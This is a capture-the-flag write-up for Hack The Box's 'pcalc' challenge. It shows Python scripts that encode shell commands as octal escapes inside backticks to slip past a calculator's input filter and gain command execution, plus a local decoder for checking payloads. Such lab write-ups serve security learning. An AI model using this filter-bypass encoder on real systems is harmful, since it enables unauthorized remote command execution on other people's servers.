HackTheBox pcalc Writeup
A medium-level web challenge on Hack The Box. A calculator endpoint evaluates a user-supplied formula, and its input filter can be sidestepped by writing a shell command as octal escapes inside backticks, which turns the calculator into a remote command execution primitive that reads the flag off the box.
https://app.hackthebox.com/challenges/542
Description
A calculator service has been deployed at an enemy's agency, for their personnel to be acquainted with human numbers. We need to infiltrate the application and get access to the secret flag stored inside its system!
Exploitation
The script below builds the payload and sends it to the formula parameter. Every character of the command is emitted as a backslash followed by its octal value, and the whole thing is wrapped in backticks: the application's string handling expands the octal escapes before the backtick command substitution runs, so the filter only ever sees backslashes, octal digits and backticks, while the shell receives cat /f*. The glob /f* is used so the flag file name does not have to be known in advance.

#!/usr/bin/env python3
import re
import sys

import requests


def generate_payload(command="cat /f*"):
    # One octal escape per character: 'c' -> \143, ' ' -> \40, '/' -> \57 ...
    # Every character is escaped, so no literal letters reach the filter.
    octal_bytes = ["\\" + format(ord(char), "o") for char in command]
    # Backticks turn the decoded string into a shell command substitution.
    return f"`{''.join(octal_bytes)}`"


def exploit(url):
    payload = generate_payload()
    print(f"[*] Generated payload: {payload}")
    try:
        # Passing the payload via params= lets requests percent-encode the
        # backslashes and backticks correctly; the server decodes them again.
        r = requests.get(f"{url}/", params={"formula": payload}, timeout=10)
        flag = re.findall(r"HTB\{[^}]+\}", r.text)
        if flag:
            print(f"[+] Found flag: {flag[0]}")
        else:
            print("[-] No flag found in response")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    url = sys.argv[1]
    target = f"http://{url}"
    exploit(target)
Summary
The pcalc Challenge on Hack The Box is a medium-level web security challenge focusing on command injection in a calculator application. The formula parameter is handed to an interpreter that evaluates it, and the input filter is meant to stop arbitrary code from going in. The exploit bypasses that filter by rewriting the shell command as octal escapes: because the interpreter expands octal escapes inside a backtick command-substitution string before executing it (PHP's backtick operator behaves this way), the filter inspects only backslashes, digits and backticks, while the shell ends up running cat /f*. The Python script above converts the command into octal bytes, sends it through the calculator's formula parameter and pulls the flag out of the response. This challenge demonstrates how a seemingly innocent calculator application becomes a remote command execution vector when user input reaches an evaluator, and that a filter which blocks characters rather than removing the dangerous sink (eval, backticks, shell_exec and friends) is trivially defeated by an alternative encoding of the same bytes.
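To check a payload offline before sending it, it helps to reproduce what the target's string parser will turn it back into. The block below is an added example, not part of the original writeup or of the challenge's own code: it generalises the encoder to arbitrary commands and pairs it with a small emulation of PHP-style escape expansion (octal \NNN, hex \xNN and the common single-character escapes) so you can confirm which command the shell would actually receive. The letter-free check encodes the assumption, not confirmed by the challenge text, that the filter keys on alphabetic characters.

```python
#!/usr/bin/env python3
"""Build octal-escaped backtick payloads and verify them locally.

Added example for the pcalc writeup. php_unescape() emulates how a
PHP-style double-quoted/backtick string expands escape sequences; it is a
local approximation written for this example, not the target's code.
"""
import re
import string


def octal_payload(command: str) -> str:
    """Wrap COMMAND in backticks with every byte written as an octal escape.

    Every character is escaped, so the result contains no letters at all;
    the only literal characters left are backslashes, octal digits and the
    two backticks. Because no literal digit ever follows an escape, a
    2-digit escape such as \\40 (space) cannot be misread as a 3-digit one.
    """
    return "`" + "".join("\\%o" % b for b in command.encode()) + "`"


# Escape forms handled by the emulator: \[0-7]{1,3}, \x[0-9A-Fa-f]{1,2}, and
# the single-character escapes listed in _SIMPLE (assumed PHP-like).
_ESCAPE = re.compile(r"\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|[nrtvef\\$\"])")
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
           "f": "\f", "\\": "\\", "$": "$", '"': '"'}


def php_unescape(s: str) -> str:
    """Expand escape sequences the way a PHP-style string parser would."""
    def expand(m: re.Match) -> str:
        esc = m.group(1)
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)   # PHP wraps values above 255
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return _SIMPLE[esc]
    return _ESCAPE.sub(expand, s)


def shell_command_from_payload(payload: str) -> str:
    """Return the command the shell would run for a backtick payload."""
    if not (payload.startswith("`") and payload.endswith("`")):
        raise ValueError("payload is not a backtick expression")
    return php_unescape(payload[1:-1])


def has_letters(s: str) -> bool:
    """True if S contains any ASCII letter (the assumed filter trigger)."""
    return any(c in string.ascii_letters for c in s)


if __name__ == "__main__":
    for cmd in ("cat /f*", "ls -la /", "id"):
        p = octal_payload(cmd)
        print(f"{cmd!r:12} -> {p}")
        print(f"{'':12}    letters in payload: {has_letters(p)}, "
              f"decodes to: {shell_command_from_payload(p)!r}")
```

Run it without arguments to see the encoder and decoder round-trip a few commands. If you need to test against a different sink, swap the escape set in _ESCAPE and _SIMPLE for the one that interpreter actually supports; the round-trip check is what tells you whether the bypass survives the target's parsing.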